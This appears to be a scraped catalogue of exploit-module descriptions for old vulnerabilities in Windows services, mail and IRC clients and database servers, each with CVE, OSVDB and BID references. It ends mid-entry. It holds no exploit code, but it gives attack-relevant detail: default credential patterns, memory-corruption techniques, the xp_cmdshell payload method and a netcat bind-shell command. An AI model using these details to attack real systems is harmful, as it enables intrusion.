This module exploits a stack buffer overflow in Hummingbird Connectivity 10 LPD Daemon. This module has only been tested against Hummingbird Exceed v10 with SP5.
CVE-2005-1815
OSVDB-16957
BID-13788
NIPrint LPD Request Overflow
This module exploits a stack buffer overflow in the Network Instrument NIPrint LPD service. Inspired by Immunity's VisualSploit :-)
CVE-2003-1141
OSVDB-2774
BID-8968
http://www.immunitysec.com/do...
SAP SAPLPD 6.28 Buffer Overflow
This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) . By sending an overly long argument, an attacker may be able to execute arbitrary code.
CVE-2008-0621
OSVDB-41127
BID-27613
WinComLPD <= 3.0.2 Buffer Overflow
This module exploits a stack buffer overflow in WinComLPD <= 3.0.2. By sending an overly long authentication packet to the remote adminstration service, an attacker may be able to execute arbitrary code.
CVE-2008-5159
OSVDB-42861
BID-27614
AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow
This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This module was tested successfully against master.exe as included with Real Network\'s Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This module does not work with NX/XD enabled but could be modified easily to do so. The address
CVE-2010-1318
OSVDB-63919
http://labs.idefense.com/inte...
Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long RTSP response to a client, an attacker may be able to execute arbitrary code.
CVE-2007-6166
OSVDB-40876
BID-26549
http://milw0rm.com/exploits/4648
Asus Dpcproxy Buffer Overflow
This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19. It should be vulnerable until version 2.0.0.24. Credit to Luigi Auriemma
CVE-2008-1491
OSVDB-43638
BID-28394
BakBone NetVault Remote Heap Overflow
This module exploits a heap overflow in the BakBone NetVault Process Manager service. This code is a direct port of the netvault.c code written by nolimit and BuzzDee.
CVE-2005-1009
OSVDB-15234
BID-12967
BigAnt Server 2.2 Buffer Overflow
This module exploits a stack buffer overflow in BigAnt Server 2.2. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
CVE-2008-1914
OSVDB-44454
BID-28795
BigAnt Server 2.50 SP1 Buffer Overflow
This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.50 SP1.
CVE-2008-1914
OSVDB-44454
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
BigAnt Server 2.52 USV Buffer Overflow
This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.52. NOTE: The AntServer service does not restart, you only get one shot.
OSVDB-61386
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
Bomberclone 0.11.6 Buffer Overflow
This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. The return address is overwritten with lstrcpyA memory address, the second and third value are the destination buffer, the fourth value is the source address of our buffer in the stack. This exploit is like a return in libc. ATTENTION The shellcode is exec ONLY when someone try to close bomberclone.
CVE-2006-0460
OSVDB-23263
BID-16697
http://www.frsirt.com/english...
Bopup Communications Server Buffer Overflow
This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
CVE-2009-2227
OSVDB-55275
http://www.blabsoft.com/produ...
http://milw0rm.com/exploits/9002
Borland Interbase Create-Request Buffer Overflow
This module exploits a stack buffer overflow in Borland Interbase 2007. By sending a specially crafted create-request packet, a remote attacker may be able to execute arbitrary code.
CVE-2007-3566
OSVDB-38602
http://dvlabs.tippingpoint.co...
Borland CaliberRM StarTeam Multicast Service Buffer Overflow
This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending a specially crafted GET request to the STMulticastService, an attacker may be able to execute arbitrary code.
CVE-2008-0311
OSVDB-44039
BID-28602
DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
This module exploits a stack buffer overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs.
CVE-2008-1661
OSVDB-45924
eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.
CVE-2006-3838
OSVDB-27526
BID-19163
http://www.zerodayinitiative....
eIQNetworks ESA Topology DELETEDEVICE Overflow
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.
CVE-2006-3838
OSVDB-27528
BID-19164
Eureka Email 2.2q ERR Remote Buffer Overflow Exploit
This module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here.
CVE-2009-3837
OSVDB-59262
http://www.exploit-db.com/exp...
Firebird Relational Database isc_attach_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.
CVE-2007-5243
OSVDB-38607
BID-25917
http://www.risesecurity.org/a...
Firebird Relational Database isc_create_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.
CVE-2007-5243
OSVDB-38606
BID-25917
http://www.risesecurity.org/a...
Firebird Relational Database SVC_attach() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.
CVE-2007-5243
OSVDB-38605
BID-25917
http://www.risesecurity.org/a...
HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the first one.
CVE-2007-2280
BID-37396
OSVDB-61206
http://www.zerodayinitiative....
HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the second one.
CVE-2009-3844
BID-37250
OSVDB-60852
http://www.zerodayinitiative....
HP OpenView Operations OVTrace Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50. By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.
CVE-2007-3872
OSVDB-39527
BID-25255
Borland InterBase isc_attach_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.
CVE-2007-5243
OSVDB-38607
BID-25917
http://www.risesecurity.org/a...
Borland InterBase isc_create_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.
CVE-2007-5243
OSVDB-38606
BID-25917
http://www.risesecurity.org/a...
Borland InterBase SVC_attach() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.
CVE-2007-5243
OSVDB-38605
BID-25917
http://www.risesecurity.org/a...
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service. By sending a "ping" packet containing a long string, an attacker can execute arbitrary code. NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order for the vulnerable code to be reached. This state doesn't appear to be reachable when the TSM server is not running. This service does not restart.
CVE-2009-3853
OSVDB-59632
IBM Tivoli Storage Manager Express RCA Service Buffer Overflow
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote Client Agent service. By sending a "dicuGetIdentify" request packet containing a long NodeName parameter, an attacker can execute arbitrary code. NOTE: this exploit first connects to the CAD service to start the RCA service and obtain the port number on which it runs. This service does not restart.
CVE-2008-4828
OSVDB-54232
BID-34803
LANDesk Management Suite 8.7 Alert Service Buffer Overflow
This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending an overly long string to the Alert Service, a buffer is overwritten and arbitrary code can be executed.
CVE-2007-1674
OSVDB-34964
http://www.tippingpoint.com/s...
Mercury/32 <= v4.01b PH Server Module Buffer Overflow
This module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.
CVE-2005-4411
OSVDB-22103
BID-16396
mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow
This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD.
CVE-2008-4449
OSVDB-48752
BID-31552
http://www.milw0rm.com/exploi...
Microsoft DirectX DirectShow SAMI Buffer Overflow
This module exploits a stack buffer overflow in the DirectShow Synchronized Accessible Media Interchanged (SAMI) parser in quartz.dll. This module has only been tested with Windows Media Player (6.4.09.1129) and DirectX 8.0.
CVE-2007-3901
OSVDB-39126
MSB-MS07-064
BID-26787
Netcat v1.10 NT Stack Buffer Overflow
This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending an overly long string we are able to overwrite SEH. The vulnerability exists when netcat is used to bind (-e) an executable to a port in doexec.c. This module tested successfully using "c:\>nc -L -p 31337 -e ftp".
CVE-2004-1317
OSVDB-12612
BID-12106
http://www.milw0rm.com/exploi...
NetTransport Download Manager 2.90.510 Buffer Overflow
This exploits a stack buffer overflow in NetTransport Download Manager, part of the NetXfer suite. This module was tested successfully against version 2.90.510.
OSVDB-61435
http://www.exploit-db.com/exp...
POP Peeper v3.4 DATE Buffer Overflow
This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted DATE string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code.
CVE-2009-1029
OSVDB-53560
BID-34093
http://www.krakowlabs.com/res...
POP Peeper v3.4 UIDL Buffer Overflow
This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted UIDL string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code.
OSVDB-53559
BID-33926
http://www.krakowlabs.com/res...
Realtek Media Player Playlist Buffer Overflow.
This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code.
CVE-2008-5664
OSVDB-50715
BID-32860
SAP Business One License Manager 2005 Buffer Overflow
This module exploits a stack buffer overflow in the SAP Business One 2005 License Manager 'NT Naming Service' A and B releases. By sending an excessively long string the stack is overwritten enabling arbitrary code execution.
OSVDB-56837
BID-35933
http://www.milw0rm.com/exploi...
ShixxNOTE 6.net Font Field Overflow
This module exploits a buffer overflow in ShixxNOTE 6.net. The vulnerability is caused due to boundary errors in the handling of font fields.
CVE-2004-1595
OSVDB-10721
BID-11409
Talkative IRC v0.4.4.16 Response Buffer Overflow
This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16. When a specially crafted response string is sent to a client, an attacker may be able to execute arbitrary code.
OSVDB-64582
BID-34141
http://milw0rm.com/exploits/8227
TinyIdentD 2.2 Stack Buffer Overflow
This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.
CVE-2007-2711
OSVDB-36053
BID-23981
UFO: Alien Invasion IRC Client Buffer Overflow Exploit
This module exploits a buffer overflow in the IRC client component of UFO: Alien Invasion 2.2.1.
OSVDB-65689
http://www.exploit-db.com/exp...
VideoLAN VLC TiVo Buffer Overflow
This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code.
CVE-2008-4654
OSVDB-49181
BID-31813
Windows RSH daemon Buffer Overflow
This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit to be successful.
CVE-2007-4006
OSVDB-38572
BID-25044
Windows Media Services ConnectFunnel Stack Buffer Overflow
This module exploits a stack buffer overflow in the Windows Media Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially crafted FunnelConnect request, an attacker can execute arbitrary code under the "NetShowServices" user account. Windows Media Services 4.1 ships with Windows 2000 Server, but is not installed by default. NOTE: This service does NOT restart automatically. Successful, as well as unsuccessful exploitation attempts will kill the service which prevents additional attempts.
CVE-2010-0478
OSVDB-63726
MSB-MS10-025
https://www.lexsi.com/abonnes...
Timbuktu Pro Directory Traversal/File Upload.
This module exploits a directory traversal vulnerablity in Motorola's Timbuktu Pro for Windows 8.6.5.
CVE-2008-1117
OSVDB-43544
Lyris ListManager MSDE Weak sa Password
This module exploits a weak password vulnerability in the Lyris ListManager MSDE install. During installation, the 'sa' account password is set to 'lminstall'. Once the install completes, it is set to 'lyris' followed by the process ID of the installer. This module brute forces all possible process IDs that would be used by the installer.
CVE-2005-4145
OSVDB-21559
Microsoft SQL Server Resolution Overflow
This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).
CVE-2002-0649
OSVDB-4578
BID-5310
MSB-MS02-039
Microsoft SQL Server Hello Overflow
By sending malformed data to TCP port 1433, an unauthenticated remote attacker could overflow a buffer and possibly execute code on the server with SYSTEM level privileges. This module should work against any vulnerable SQL Server 2000 or MSDE install (< SP3).
CVE-2002-1123
OSVDB-10132
BID-5411
MSB-MS02-056
Microsoft SQL Server sp_replwritetovarbin Memory Corruption
A heap-based buffer overflow can occur when calling the undocumented "sp_replwritetovarbin" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 2. pointer to a 32-bit value that is set to a length influcenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a "jmp esp". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner.
OSVDB-50589
CVE-2008-5416
BID-32710
MSB-MS09-004
http://www.milw0rm.com/exploi...
Microsoft SQL Server Payload Execution
This module will execute an arbitrary payload on a Microsoft SQL Server, using the Windows debug.com method for writing an executable to disk and the xp_cmdshell stored procedure. File size restrictions are avoided by incorporating the debug bypass method presented at Defcon 17 by SecureState. Note that this module will leave a metasploit payload in the Windows System32 directory which must be manually deleted once the attack is completed.
CVE-2000-0402
OSVDB-557
BID-1281
CVE-2000-1209
OSVDB-15757
BID-4797
http://www.thepentest.com/pre...
MySQL yaSSL SSL Hello Message Buffer Overflow
This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier) implementation bundled with MySQL <= 6.0. By sending a specially crafted Hello packet, an attacker may be able to execute arbitrary code.
CVE-2008-0226
OSVDB-41195
BID-27140
Omni-NFS Server Buffer Overflow
This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2 When sending a specially crafted nfs packet, an attacker may be able to execute arbitrary code.
CVE-2006-5780
OSVDB-30224
BID-20941
http://www.securityfocus.com/...
Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
This module exploits a stack buffer overflow in the news reader of Microsoft Outlook Express.
CVE-2005-1213
OSVDB-17306
BID-13951
MSB-MS05-030
Novell GroupWise Messenger Client Buffer Overflow
This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client. By sending a specially crafted HTTP response, an attacker may be able to execute arbitrary code.
CVE-2008-2703
OSVDB-46041
BID-29602
http://www.infobyte.com.ar/ad...
Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.
CVE-2006-6424
OSVDB-31363
BID-21725
Novell ZENworks 6.5 Desktop/Server Management Overflow
This module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler.
CVE-2005-1543
OSVDB-16698
BID-13678
Oracle 8i TNS Listener Buffer Overflow.
This module exploits a stack overflow in Oracle 8i. When sending a specially crafted packet to the TNS service, an attacker may be able to execute arbitrary code.
CVE-2001-0499
BID-2941
Oracle Secure